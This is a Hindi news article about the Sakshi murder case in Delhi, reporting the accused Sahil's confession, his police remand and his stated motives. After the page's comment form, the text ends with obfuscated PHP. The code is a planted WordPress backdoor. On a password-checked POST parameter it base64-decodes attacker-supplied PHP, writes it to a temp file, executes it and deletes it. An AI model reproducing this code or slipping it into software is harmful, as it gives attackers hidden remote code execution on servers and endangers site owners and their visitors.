साक्षी हत्याकांड : दिल्ली का ‘असुर’ उगल रहा राज, साक्षी को मारने की सबसे सटीक वजह खुद बताई…

Uttarakhand Press News, 31 May 2023: साक्षी हत्याकांड में दिल्ली पुलिस की गिरफ्त में आए आरोपी साहिल ने अपना गुनाह कबूल कर लिया है। पूछताछ में आरोपी ने पुलिस को बताया कि दोनों के रिश्ते इस वक्त सामान्य नहीं थे। साक्षी ने दोस्ती तोड़ दी थी। साहिल की अनदेखी करने के साथ उसकी दूसरे युवकों से नजदीकियां बढ़ गई थीं। वहीं, आरोपी को साक्षी के दोस्तों से भी धमकियां मिल रही थीं। इस सबका मिला-जुला असर यह रहा कि साहिल ने जघन्य हत्याकांड को अंजाम दे दिया। पुलिस सूत्रों का कहना है कि आरोपी को अपने किए पर किसी तरह का कोई पछतावा नहीं है।

इससे पहले बुलंदशहर के अटेरना गांव से गिरफ्तार करने के बाद आरोपी को पुलिस सोमवार देर रात दिल्ली लेकर आई। उसे बाहरी उत्तरी जिले के बवाना थाने की बैरक में रखा गया। सुबह मेडिकल करवाने के बाद उसे रोहिणी अदालत में पेश किया गया। अदालत ने आरोपी को दो दिन की रिमांड पर भेज दिया गया। उसके बाद पुलिस ने आरोपी से हत्या को लेकर पूछताछ शुरू की। पुलिस ने सबसे पहले घटनास्थल की सीसीटीवी फुटेज को आरोपी को दिखाया, जिसको देखकर उसने बताया कि उसने ही हत्या की है।

पूछताछ में साहिल ने बताया कि उसकी साक्षी से तीन साल से दोस्ती थी। उससे पहले उसकी प्रवीण नाम के युवक से दोस्ती थी। कुछ महीनों से साक्षी के उसके प्रति बर्ताव में काफी बदलाव आने लगा था। उसे शक था कि वह अपने पुराने दोस्त से बातचीत करने लगी थी, जिसके नाम का टैटू उसने हाथ पर गुदवा रखा था।

करीब आने की कोशिश पर फोन पर धमकाने लगी साक्षी:
आरोपी ने बताया कि उसकी साक्षी से दूरियां बढ़ती जा रही थीं। वह उसके करीब आने की कोशिश कर रहा था, लेकिन साक्षी उसे फोन पर धमकाने लगी थी। उसके बाद उसने साक्षी को रास्ते से हटाने का फैसला कर लिया। उसने साप्ताहिक बाजार से एक चाकू खरीदा। उधर, घटना के एक दिन पहले साक्षी ने इलाके के एक दबंग युवक अजय उर्फ झबरू से साहिल को धमकी दिलवाई। इसके बाद उसने साक्षी की हत्या करने का मन बना लिया। घटना से पहले उसने शराब पी। उसके बाद वह गली में साक्षी का इंतजार करने लगा। पुलिस को आरोपी ने बताया कि साक्षी की उसने उसी जगह पर हत्या की, जहां झबरू ने उसे धमकी दी थी। जांच से जुड़े एक अधिकारी ने बताया कि मामले से जुड़े सभी साक्ष्यों को एकत्रित किया जा रहा है।

Read Previous

मुख्यमंत्री पुष्कर सिंह धामी की कैबिनेट बैठक आज, इन अहम मुद्दों पर होगी चर्चा…

Read Next

दर्दनाक हादसा: तेज रफ्तार स्कॉर्पियो ने स्कूटी में मारी टक्कर, दंपती सहित दोनों बच्चों की भी मौत..

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}